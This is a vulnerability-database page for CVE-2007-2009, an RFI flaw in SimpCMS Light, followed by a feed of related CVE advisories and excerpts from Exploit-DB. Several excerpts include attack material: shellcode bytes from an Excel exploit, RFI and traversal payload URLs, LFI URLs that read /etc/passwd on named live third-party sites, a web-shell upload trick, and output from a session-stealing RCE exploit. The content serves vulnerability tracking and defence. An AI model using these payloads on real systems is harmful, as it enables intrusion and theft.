CVE-2007-2009
published 2007-04-12CVE-2007-2009: PHP remote file inclusion vulnerability in index.php in SimpCMS Light 04.10.2007 and earlier allows remote attackers to execute arbitrary PHP code via a URL in…
PriorityP339medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
2.83%
84.9th percentile
PHP remote file inclusion vulnerability in index.php in SimpCMS Light 04.10.2007 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the site parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| simpcms | simpcms | — | — |
CVSS provenance
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vendor_redhat6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-8phr-7r8f-j385: PHP remote file inclusion vulnerability in index
ghsa_unreviewed·2022-05-01
CVE-2007-2009 [MEDIUM] GHSA-8phr-7r8f-j385: PHP remote file inclusion vulnerability in index
PHP remote file inclusion vulnerability in index.php in SimpCMS Light 04.10.2007 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the site parameter.
Kernel
namei: allow restricted O_CREAT of FIFOs and regular files
kernel_security·2018-08-23·CVSS 7.2
CVE-2000-1134 [HIGH] namei: allow restricted O_CREAT of FIFOs and regular files
namei: allow restricted O_CREAT of FIFOs and regular files
Disallows open of FIFOs or regular files not owned by the user in world
writable sticky directories, unless the owner is the same as that of the
directory or the file is opened without the O_CREAT flag. The purpose
is to make data spoofing attacks harder. This protection can be turned
on and off separately for FIFOs and regular files via sysctl, just like
the symlinks/hardlinks protection. This patch is based on Openwall's
"HARDEN_FIFO" feature by Solar Designer.
This is a brief list of old vulnerabilities that could have been prevented
by this feature, some of them even allow for privilege escalation:
CVE-2000-1134
CVE-2007-3852
CVE-2008-0525
CVE-2009-0416
CVE-2011-4834
CVE-2015-1838
CVE-2015-7442
CVE-2016-7489
This list is no
Citrix
CVE-2010-4515: Cross-site scripting (XSS) vulnerability in Citrix Web Interface 5.0, 5.1, and 5.3 allows remote attackers to inject arbitrary web script or HTML via
vendor_citrix·2010-12-09·CVSS 4.3
CVE-2010-4515 [MEDIUM] CWE-79 CVE-2010-4515: Cross-site scripting (XSS) vulnerability in Citrix Web Interface 5.0, 5.1, and 5.3 allows remote attackers to inject arbitrary web script or HTML via
CVE-2010-4515: Cross-site scripting (XSS) vulnerability in Citrix Web Interface 5.0, 5.1, and 5.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2007-6477 and CVE-2009-2454.
Red Hat
postgresql: SQL privilege escalation via modifications to session-local state
vendor_redhat·2009-12-14·CVSS 6.5
CVE-2009-4136 [MEDIUM] postgresql: SQL privilege escalation via modifications to session-local state
postgresql: SQL privilege escalation via modifications to session-local state
PostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before 8.4.2 does not properly manage session-local state during execution of an index function by a database superuser, which allows remote authenticated users to gain privileges via a table with crafted index functions, as demonstrated by functions that modify (1) search_path or (2) a prepared statement, a related issue to CVE-2007-6600 and CVE-2009-3230.
Red Hat
OpenJDK BMP parsing DoS with UNC ICC links (6632445)
vendor_redhat·2009-11-03·CVSS 4.3
CVE-2009-3885 [MEDIUM] OpenJDK BMP parsing DoS with UNC ICC links (6632445)
OpenJDK BMP parsing DoS with UNC ICC links (6632445)
Sun Java SE 5.0 before Update 22 and 6 before Update 17 on Windows allows remote attackers to cause a denial of service via a BMP file containing a link to a UNC share pathname for an International Color Consortium (ICC) profile file, probably a related issue to CVE-2007-2789, aka Bug Id 6632445.
Red Hat
postgresql: SQL privilege escalation, incomplete fix for CVE-2007-6600
vendor_redhat·2009-09-09·CVSS 6.5
CVE-2009-3230 [MEDIUM] postgresql: SQL privilege escalation, incomplete fix for CVE-2007-6600
postgresql: SQL privilege escalation, incomplete fix for CVE-2007-6600
The core server component in PostgreSQL 8.4 before 8.4.1, 8.3 before 8.3.8, 8.2 before 8.2.14, 8.1 before 8.1.18, 8.0 before 8.0.22, and 7.4 before 7.4.26 does not use the appropriate privileges for the (1) RESET ROLE and (2) RESET SESSION AUTHORIZATION operations, which allows remote authenticated users to gain privileges. NOTE: this is due to an incomplete fix for CVE-2007-6600.
Red Hat
eggdrop DoS (crash)
vendor_redhat·2009-05-26·CVSS 6.8
CVE-2009-1789 [MEDIUM] eggdrop DoS (crash)
eggdrop DoS (crash)
mod/server.mod/servmsg.c in Eggheads Eggdrop and Windrop 1.6.19 and earlier allows remote attackers to cause a denial of service (crash) via a crafted PRIVMSG that causes an empty string to trigger a negative string length copy. NOTE: this issue exists because of an incorrect fix for CVE-2007-2807.
Red Hat
fail2ban: remote DoS via crafted domain names
vendor_redhat·2009-02-04·CVSS 6.8
CVE-2009-0362 [MEDIUM] fail2ban: remote DoS via crafted domain names
fail2ban: remote DoS via crafted domain names
filter.d/wuftpd.conf in Fail2ban 0.8.3 uses an incorrect regular expression that allows remote attackers to cause a denial of service (forced authentication failures) via a crafted reverse-resolved DNS name (rhost) entry that contains a substring that is interpreted as an IP address, a different vulnerability than CVE-2007-4321.
Red Hat
gdm not built with tcp_wrappers
vendor_redhat·2007-05-11·CVSS 6.0
CVE-2009-2697 [MEDIUM] gdm not built with tcp_wrappers
gdm not built with tcp_wrappers
The Red Hat build script for the GNOME Display Manager (GDM) before 2.16.0-56 on Red Hat Enterprise Linux (RHEL) 5 omits TCP Wrapper support, which might allow remote attackers to bypass intended access restrictions via XDMCP connections, a different vulnerability than CVE-2007-5079.
Red Hat
lftp mirror --script does not escape names and targets of symbolic links
vendor_redhat·2007-01-09·CVSS 6.8
CVE-2007-2348 [MEDIUM] lftp mirror --script does not escape names and targets of symbolic links
lftp mirror --script does not escape names and targets of symbolic links
mirror --script in lftp before 3.5.9 does not properly quote shell metacharacters, which might allow remote user-assisted attackers to execute shell commands via a malicious script. NOTE: it is not clear whether this issue crosses security boundaries, since the script already supports commands such as "get" which could overwrite executable files.
Statement: This issue does not affect lftp as supplied with Red Hat Enterprise Linux 3.
This issue was addressed for Red Hat Enterprise Linux 5 by
https://rhn.redhat.com/errata/RHSA-2009-1278.html
The Red Hat Security Response Team has rated this issue as having low security impact, this issue will not fixed in Red Hat Enterprise Linux 4.
Package: lftp (Red Hat Enterprise
No detection rules found.
Exploit-DB
Microsoft Excel - FEATHEADER Record (MS09-067)
exploitdb·2010-08-21·CVSS 7.8
CVE-2009-3129 [HIGH] Microsoft Excel - FEATHEADER Record (MS09-067)
Microsoft Excel - FEATHEADER Record (MS09-067)
---
#MS Excel Malformed FEATHEADER Record Exploit
#CVE-2009-3129, MS09-067, OSVDB-59860
#Vulnerble application MS office 2003/2007
#Tested on XP SP2 - MS Ofice 2003 v. 11.5604.5606
#Sean Larsson - Original Discovery
#!/usr/bin/python
import sys
import zlib
#Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes by RubberDuck =)
shellcode = (
b"\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
b"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
b"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
b"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
b"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
b"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
b"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
b"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
b"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
b"\x
Exploit-DB
Kasseler CMS 2.0.5 - Bypass / Download Backup
exploitdb·2010-04-26
CVE-2009-4822 Kasseler CMS 2.0.5 - Bypass / Download Backup
Kasseler CMS 2.0.5 - Bypass / Download Backup
---
| # Title : kasseler cms 2.0.5 => by Pass / Download Backup Vulnerability
| # Author : indoushka
| # email : [email protected]
| # Dork : Copyright ©2007-2009 by Kasseler CMS. All rights reserved.
| # Tested on: windows SP2 Français V.(Pnx2 2.0)
| # Bug : Backup
====================== Exploit By indoushka =================================
# Exploit :
1 - http://127.0.0.1/kasseler/backup.php
File size: 37.38 KB
Tables processed: 39
Rows processed: 37
2 - http://127.0.0.1/uploads/backup/auto_2010-04-27_14-29.sql
in lig 645:668 col 1 you found the login information
INSERT INTO `kasseler_users` VALUES
(-1, 'guest', 'Guest', '', '', 'default.png', '0000-00-00 00:00:00', 'default', 0, '', '', '', '', '', 5, '', '0', '', '0000-00-00 00
Exploit-DB
Virtual PC Hypervisor - Memory Protection
exploitdb·2010-03-17
CVE-2010-1225 Virtual PC Hypervisor - Memory Protection
Virtual PC Hypervisor - Memory Protection
---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Virtual PC Hypervisor Memory Protection Vulnerability
1. *Advisory Information*
Title: Virtual PC Hypervisor Memory Protection Vulnerability
Advisory Id: CORE-2009-0803
Advisory URL:
http://www.coresecurity.com/content/virtual-pc-2007-hypervisor-memory-protection-bug
Date published: 2010-03-16
Date of last update: 2010-03-16
Vendors contacted: Microsoft
Release mode: User release
2. *Vulnerability Information*
Class: Improper Access Control [CWE-285]
Impact: Security bypass
Remotely Exploitable: No
Locally Exploitable: Yes
Bugtraq ID: 38764
CVE Name: N/A
3. *Vulnerability Description*
Windows Virtual PC
Exploit-DB
Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow
exploitdb·2010-01-06
CVE-2007-6166 Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow
Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow
---
# Exploit Title: Apple QuickTime 7.2/7.3 RTSP BOF (Perl)
# Date: 2009-01-06
# Author: Jacky
# Software Link: [downoad link if available]
# Version: 7.2/7.3
# Tested on: Windows XP SP3
# CVE : [if exists]
# Code :
#Apple QuickTime 7.2/7.3 RTSP BOF (Perl Edition )
#Discovered by (Krystian Kloskowski (h07) )
#Written and coded by Jacky!
#All Greetz to Peter Van Eeckhoutte and Corelan Team ( Best exploitation team);-)
#This time i wrote the exploit in perl , because i saw that it was written
#many times in python and ruby only !
#This exploit is for EDUCATIONAL PURPOSES ONLY !!!
#!/usr/bin/perl -w
# (RTSP) Content-Type: [A * 995] + [B * 4096]\r\n
#
# 0x41414141 Pointer to next SEH record
# 0x42424242 SE handler
use strict;
use Socket;
my $ju
Exploit-DB
phUploader 2 - Arbitrary File Upload
exploitdb·2009-12-20
CVE-2007-4527 phUploader 2 - Arbitrary File Upload
phUploader 2 - Arbitrary File Upload
---
# Exploit Title: phUploader Remote File Upload Vulnerability
# Date: 20-12-2009
# Author: wlhaan-hacker
#
# Version: v2
# CVE : [N/A]
~ Script Name : phUploader)
~ Language : php
~
~ email: [email protected]
~
Dork : Powered By phUploader
Exploit :
http://{target}/script path/upload.php
chang shell
shell.php.flac
go to shell
http://{target}/script path/uploads/shell.php.flac
Exploit viduo
Download:
http://filaty.com/f/912/99431/up5.rar.html
thank you for
shooq hacker
www.sa-hacker.com/vb
Exploit-DB
Smart PHP Subscriber - Multiple Disclosure Vulnerabilities
exploitdb·2009-12-14
CVE-2007-0518 Smart PHP Subscriber - Multiple Disclosure Vulnerabilities
Smart PHP Subscriber - Multiple Disclosure Vulnerabilities
---
[#-----------------------------------------------------------------------------------------------#]
[#] Title: Smart PHP Subscriber Multiple Disclosure Vulnerabilities
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail.com
[#] Date: 14. December 2009.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: Smart PHP Subscriber
[#] Version: the only one there is
[#] Platform: PHP
[#] Vulnerability: Multiple Disclosure Vulnerabilities
[#-----------------------------------------------------------------------------------------------#]
[#]Content
|--Admin password disclosure
|--Subscribers list disclosure
[*]Admin password disclosure
Admin password is sav
Exploit-DB
CoreHTTP Web server 0.5.3.1 - Off-by-One Buffer Overflow
exploitdb·2009-12-02·CVSS 9.0
CVE-2009-3586 [CRITICAL] CoreHTTP Web server 0.5.3.1 - Off-by-One Buffer Overflow
CoreHTTP Web server 0.5.3.1 - Off-by-One Buffer Overflow
---
# bugtraq: http://seclists.org/bugtraq/2009/Dec/99
# census ID: census-2009-0003
# URL: http://census-labs.com/news/2009/12/02/corehttp-web-server/
# CVE ID: CVE-2009-3586
# Affected Products: CoreHTTP web server versions buffer,
# 46: "%" PATHSIZE_S "[A-Za-z] %" PATHSIZE_S "s%*[ \t\n]", req, url);
#
# The buffers req and url are declared to be of size 256 bytes (PATHSIZE)
# and the sscanf() call writes 256 bytes (PATHSIZE_S) to these buffers
# without NULL terminating them.
#
# Note that this is not vulnerability CVE-2007-4060 in which the same
# sscanf() call contained no bounds check at all.
#
# This vulnerability can lead to denial of service attacks against the
# CoreHTTP web server and potentially to the remote execution
Exploit-DB
TEKUVA - Password Reminder Authentication Bypass
exploitdb·2009-11-21
CVE-2009-4781 TEKUVA - Password Reminder Authentication Bypass
TEKUVA - Password Reminder Authentication Bypass
---
#!/usr/bin/perl
# Exploit: TEKUVA Password Reminder Authentication Bypass
# Date: [11/19/2009]
# Author: iqlusion [[email protected]]
# Software Link: http://download.cnet.com/Password-Reminder/3000-2064_4-10966598.html
# Version: 1.0.0.1
# Info: TEKUVA Password Reminder is a password vault that allows you to store all
# your credentials in one spot and all you have to remember is a single 'main'
# password to access your vault. Unfortunately, the vault is actually an
# Access 2007 database that is protected by a password which is hard coded into
# the program, not your main password.
#
# This script connects to the database using the hard coded db password and dumps
# everything into an HTML table, bypassing the need to enter th
Exploit-DB
CubeCart 4 - Session Management Bypass
exploitdb·2009-10-30
CVE-2009-3904 CubeCart 4 - Session Management Bypass
CubeCart 4 - Session Management Bypass
---
CubeCart 4 Session Management Bypass
Release Date: 2009/10/29
Author: Bogdan Calin (bogdan [at] acunetix [dot] com)
Severity: Critical
Vendor Status: Vendor has released an updated version
I. Background
>From Wikipedia: CubeCart is a free-to-use eCommerce software solution,
designed to allow individuals and businesses sell tangible and digital
goods on line.
CubeCart is not Open Source software, although full source code is
available at no cost, and the custom licensing model allows for
customisation of the code.
...
CubeCart has developed a large fanbase, due in part, to the relative
ease of creating modifications and enhancements.
In the September/October 2007 issue of Practical eCommerce magazine,
CubeCart was placed at #1 in their list of
Exploit-DB
SharePoint 2007 - Team Services Source Code Disclosure
exploitdb·2009-10-26
CVE-2009-3830 SharePoint 2007 - Team Services Source Code Disclosure
SharePoint 2007 - Team Services Source Code Disclosure
---
Summary
Name: SharePoint Team Services source code disclosure through download
facility
Release Date: 21 October 2009
Reference: NGS00532
Discover: Daniel Martin
Vendor: Microsoft
Systems Affected: SharePoint 2007 (12.0.0.6219, 12.0.0.4518 and
possibly others)
Risk: Medium
Status: Reported
TimeLine
Discovered: 17 September 2008
Released: 2 October 2008
Approved: 3 October 2008
Reported: 8 October 2008
Fixed:
Published: 23 October 2009
Description
Microsoft SharePoint is a browser-based collaboration and document
management platform. It can be used to host web sites that access shared
workspaces and documents, as well as specialized applications like wikis
and blogs from a browser.
It was found that the download facility of Mic
Exploit-DB
Joomla! Component com_album 1.14 - Directory Traversal
exploitdb·2009-09-17
CVE-2009-3318 Joomla! Component com_album 1.14 - Directory Traversal
Joomla! Component com_album 1.14 - Directory Traversal
---
Joomla Component com_album Directory Traversal Vuln (version Album #1.14 )
# Author : DreamTurk
# mail : [email protected]
# home page : www.turkguvenligi.info
Down : http://www.breedveld.net/index.php?option=com_remository&Itemid=193&func=startdown&id=1
exp : http://localhost/index.php?option=com_album&Itemid=128&target=/../..
# gretZ : aLL My Friends & turkguvenligi.info Members & t4cs1zkr4L
note:
Album
23-05-2007
Roland Breedveld
This component is released under the GNU/GPL License
[email protected]
Breedveld.net
1.14
Album Component For Joomla/str0ke
# milw0rm.com [2009-09-17]
Exploit-DB
Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
exploitdb·2009-06-08
CVE-2009-2015 Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
---
Joomla Component MooFAQ Local File Inclusion Vulnerability
###################################################
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Vulnerability : LFI
###################################################
Example:
http://localHost/path/components/com_moofaq/includes/file_includer.php?gzip=0&file=[LFI]
Demo Live (1):
http://www.paginaswebhonduras.com/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd
Demo Live (2):
http://www.uers.gov.do/components/com_moofaq/includes/file_includer.php?gzip=0&file=/etc/passwd
++++++++++++++++++++++++++++++++
[!] Produced in South America
FAQ Component using mooTools
20 July 2007
1.0
1.0.13
Douglas
Exploit-DB
Pluxml 0.3.1 - Remote Code Execution
exploitdb·2007-06-24
CVE-2007-3542 Pluxml 0.3.1 - Remote Code Execution
Pluxml 0.3.1 - Remote Code Execution
---
sploit.php -url http://victim.com/pluxml0.3.1/ -ip 90.27.10.196
# [/]Waiting for connection on http://90.27.10.196:80/
# [!]Now you have to make the victim to click on the url
# [+]Received 395 bytes from 182.26.54.2:2007
# [+]Sending 366 bytes to 182.26.54.2:2007
# [+]Received 326 bytes from 182.26.54.2:2009
# [+]Sending 366 bytes to 182.26.54.2:2009
# [+]Received 692 bytes from 182.26.54.2:2010
# [!]Received one cookie from 182.26.54.2:2010
# [/]Verifying if there is a valid session id cookie
# [-]No: pollvote=1
# [!]Yes: PHPSESSID=c6255827c1a07c51a95af691a612484b
# [+]The created socket has been shut down
# $shell> whoami
# darkfig
#
if($argc
URL: acid-root.new.fr || mgsdl.free.fr
IRC: #[email protected]
Note: Coded for fun 8)
Usage: $a
Exploit-DB
GDivX Zenith Player AviFixer Class - 'fix.dll 1.0.0.1' Buffer Overflow (PoC)
exploitdb·2007-05-09
CVE-2009-3967 GDivX Zenith Player AviFixer Class - 'fix.dll 1.0.0.1' Buffer Overflow (PoC)
GDivX Zenith Player AviFixer Class - 'fix.dll 1.0.0.1' Buffer Overflow (PoC)
---
' IE 6 / GDivX Zenith Player AviFixer Class (fix.dll v. 1.0.0.1) buffer overflow POC by rgod
' tested on xp sp2
EIP= "BBBB"
BOF=String(264, "A") + EIP + String(9999, unescape("%90"))
target.SetInputFile BOF
# milw0rm.com [2007-05-09]
Exploit-DB
SimpCMS 04.10.2007 - 'site' Remote File Inclusion
exploitdb·2007-04-10
CVE-2007-2009 SimpCMS 04.10.2007 - 'site' Remote File Inclusion
SimpCMS 04.10.2007 - 'site' Remote File Inclusion
---
Bug Found By Dr.RoVeR -->Arab48 Hacker
Contact: [email protected]
---
Script: SimpCMS Light
Download: http://www.simpcms.com/light/normal/simp-cms-light.zip
--
Bug File: index.php
Bug code in line 31:
include $site.".php";
--
Exploit:
http://site.com/[path]/index.php?site=[EvilScript]
# milw0rm.com [2007-04-10]
Bugzilla
CVE-2007-4567 kernel: ipv6_hop_jumbo remote system crash
bugzilla·2009-12-18·CVSS 7.8
CVE-2007-4567 [HIGH] CVE-2007-4567 kernel: ipv6_hop_jumbo remote system crash
CVE-2007-4567 kernel: ipv6_hop_jumbo remote system crash
Originally discovered by Victor Julien that there is a way to crash the Linux kernel by sending a single IPv6 packet at it.
1) The CVE-2007-4567 issue was reported to Red Hat in September 2007. Red Hat Enterprise Linux 5 was found not to be affected.
2) On December 18, 2009, a customer reported to us that Red Hat Enterprise Linux 5 was vulnerable to CVE-2007-4567.
3) Investigations showed that the issue was introduced in the RHBA-2008-0314 update on May 21, 2008 via a backport of a collection of patches for DoD IPv6 conformance.
4) Updates released on January 7, 2010 for Red Hat Enterprise Linux 5, resolving CVE-2007-4567.
Note that the Linux kernels as shipped with Red Hat Enterprise Linux 3, 4, and Red Hat Enterprise MRG are
Bugzilla
CVE-2009-1789 eggdrop DoS (crash)
bugzilla·2009-05-26·CVSS 6.8
CVE-2009-1789 [MEDIUM] CVE-2009-1789 eggdrop DoS (crash)
CVE-2009-1789 eggdrop DoS (crash)
mod/server.mod/servmsg.c in Eggheads Eggdrop and Windrop 1.6.19 and
earlier allows remote attackers to cause a denial of service (crash)
via a crafted PRIVMSG that causes an empty string to trigger a
negative string length copy. NOTE: this issue exists because of an
incorrect fix for CVE-2007-2807.
http://secunia.com/advisories/35104
Discussion:
Created eggdrop tracking bugs for this issue
CVE-2009-1789 Affects: F10 [bug #502651]
CVE-2009-1789 Affects: F8 [bug #502652]
CVE-2009-1789 Affects: F9 [bug #502653]
CVE-2009-1789 Affects: Fdevel [bug #502654]
---
The upstream fix should be here:
http://cvs.eggheads.org/viewvc/viewvc.cgi/eggdrop1.6/src/mod/server.mod/servmsg.c?r1=1.100&r2=1.101
---
Package: eggdrop-1.6.19-4.fc12 Tag: dist-f12 Status: compl
Bugzilla
CVE-2009-1284 tetex, texlive: bibtex's invalid reads/writes when parsing big *.bib file
bugzilla·2009-03-25·CVSS 5.0
CVE-2009-1284 [MEDIUM] CVE-2009-1284 tetex, texlive: bibtex's invalid reads/writes when parsing big *.bib file
CVE-2009-1284 tetex, texlive: bibtex's invalid reads/writes when parsing big *.bib file
A security flaw was found in bibtex, a tool for preparing bibliography for
(La)Tex. An attacker could use this flaw to cause a denial of
service (application crash), or, possibly cause memory corruption, by
providing a big *.bib bibliography file for processing with the bibtex
tool.
References:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=520920
Discussion:
Created attachment 336659
Reproducer
Scenario:
1, Untar provided archive
2, bibtex livre_fp.aux
---
This issue affects all versions of the tetex package, as shipped
with Red Hat Enterprise Linux 2.1, 3, 4, and 5.
This issue affects all versions of the texlive-2007 package, as shipped
with Fedora releases of 9, 10, and devel.
---
It seem
http://secunia.com/advisories/24851http://www.attrition.org/pipermail/vim/2007-April/001513.htmlhttp://www.securityfocus.com/archive/1/465343/100/100/threadedhttp://www.securityfocus.com/bid/23439http://www.vupen.com/english/advisories/2007/1348https://exchange.xforce.ibmcloud.com/vulnerabilities/33572https://www.exploit-db.com/exploits/3705http://secunia.com/advisories/24851http://www.attrition.org/pipermail/vim/2007-April/001513.htmlhttp://www.securityfocus.com/archive/1/465343/100/100/threadedhttp://www.securityfocus.com/bid/23439http://www.vupen.com/english/advisories/2007/1348https://exchange.xforce.ibmcloud.com/vulnerabilities/33572https://www.exploit-db.com/exploits/3705
2007-04-12
Published